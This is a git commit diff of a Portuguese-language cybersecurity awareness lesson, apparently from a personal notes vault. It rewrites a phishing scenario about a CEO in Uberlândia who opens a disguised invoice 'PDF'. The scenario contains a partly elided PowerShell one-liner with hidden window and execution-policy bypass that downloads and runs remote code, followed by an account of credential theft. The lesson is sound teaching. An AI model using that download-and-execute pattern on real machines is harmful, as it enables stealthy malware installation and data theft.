vault backup: 2026-02-22 14:07:17

This commit is contained in:
Álvaro Antônio de Lacerda Rosário 2026-02-22 14:07:17 -03:00
parent adfd65ea71
commit 08cc6c8d5c

View File

@ -14,7 +14,7 @@ Cybersegurança não é hoodie + tela verde.
- Não é força bruta cinematográfica. - Não é força bruta cinematográfica.
- É entender como o sistema funciona melhor que quem construiu. - É entender como o sistema funciona melhor que quem construiu.
Se você tem um cadeado que precisa ser aberto, você não precisa da chave. Você precisa entender como o cadeado funciona Se você tem um cadeado que precisa ser aberto, você não precisa da chave. Você precisa entender como o cadeado funciona.
### Exercício mental ### Exercício mental
Eu quero invadir sua casa. Quem eu chamo? Eu quero invadir sua casa. Quem eu chamo?
@ -42,8 +42,108 @@ Pergunte para qualquer estrategista como vencer uma batalha. Sua provavelmente r
> "Conheça seu inimigo" > "Conheça seu inimigo"
### Exemplo de caso real ### Exemplo de caso real
Um CEO de uma empresa de Uberlândia está sentado no seu escritório fazendo seu trabalho. De vez em quando conversa com os funcionários. Reclama que o ar condicionado está muito fraco. Enquanto isso ele checa seus emails. Dentro deles há um email que passaria despercebido. "Nota fiscal da Empresa X (inventar)". Inocentemente ele abre, baixa o arquivo zip, e dentro tem um arquivo. `nf-210230120310240102.pdf`. O que ele não percebe é que não é um arquivo PDF, e sim um link para um endereço peculiar. Esse endereço não é da internet, e sim uma linha de comando. ## Caso real (adaptado)
`powershell curl exemplo.com | execute` (melhorar). Sem perceber, ele abre. Uma tela do prompt de comando pisca em sua tela por um segundo. Pronto. Agora hackers tem acesso à sua máquina. Podem passar dias despercebidos enquanto colhem inteligência, dados de clientes, e qualquer outra informação que possa ser útil no futuro para extorquir ou aplicar golpes à empresa. Uberlândia, 14h37.
O CEO de uma empresa local está no escritório.
Reuniões pela manhã.
Planilhas abertas.
WhatsApp Web piscando.
Ar-condicionado fraco — ele comenta com alguém da equipe.
No meio disso, ele confere os e-mails.
Assunto:
"Nota Fiscal Fornecedor Atlas Comercial LTDA"
Nada estranho.
A empresa realmente tem fornecedores.
O layout do e-mail parece normal.
Assinatura, CNPJ, telefone.
Tudo plausível.
Ele abre.
Anexo:
nf-210230120310240102.zip
Ele extrai.
Dentro:
nf-210230120310240102.pdf
Ícone de PDF.
Nome de PDF.
Extensão de PDF.
Ele dá dois cliques.
Por menos de um segundo,
uma janela preta pisca na tela.
Ele nem percebe.
Acredita que o arquivo corrompeu.
Fecha.
Volta para o trabalho.
O que ele não viu:
O arquivo não era um PDF.
Era um atalho disfarçado.
Um pequeno script.
Algo equivalente a:
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest ... | Invoke-Expression"
Em português simples:
“Baixe código da internet.
Execute.
Não mostre nada.”
Em menos de 3 segundos:
- Um agente é instalado.
- A máquina estabelece conexão reversa.
- Um servidor externo agora pode enviar comandos.
- A sessão está ativa.
Não houve:
- Exploit sofisticado.
- Zero-day.
- Quebra de criptografia.
- Força bruta.
Só um clique.
Nos dias seguintes:
- Credenciais salvas no navegador são extraídas.
- Tokens de sessão são copiados.
- Acesso ao sistema interno é mapeado.
- Pastas compartilhadas são indexadas.
- E-mails são lidos.
- Dados de clientes são copiados silenciosamente.
Nada trava.
Nada quebra.
Nada avisa.
Sem ransomware.
Sem tela vermelha.
Sem pedido de resgate.
Só coleta.
Meses depois,
a empresa descobre que seus dados estão sendo usados
para aplicar golpes em seus próprios clientes.
A pergunta não é:
“Como invadiram?”
A pergunta é:
Onde estava o parafuso solto?
## Parte 4: Vulnerabilidades do Mundo Real ## Parte 4: Vulnerabilidades do Mundo Real
### Caso 1: Sistema de Controle de Acesso vazando senhas de rede. ### Caso 1: Sistema de Controle de Acesso vazando senhas de rede.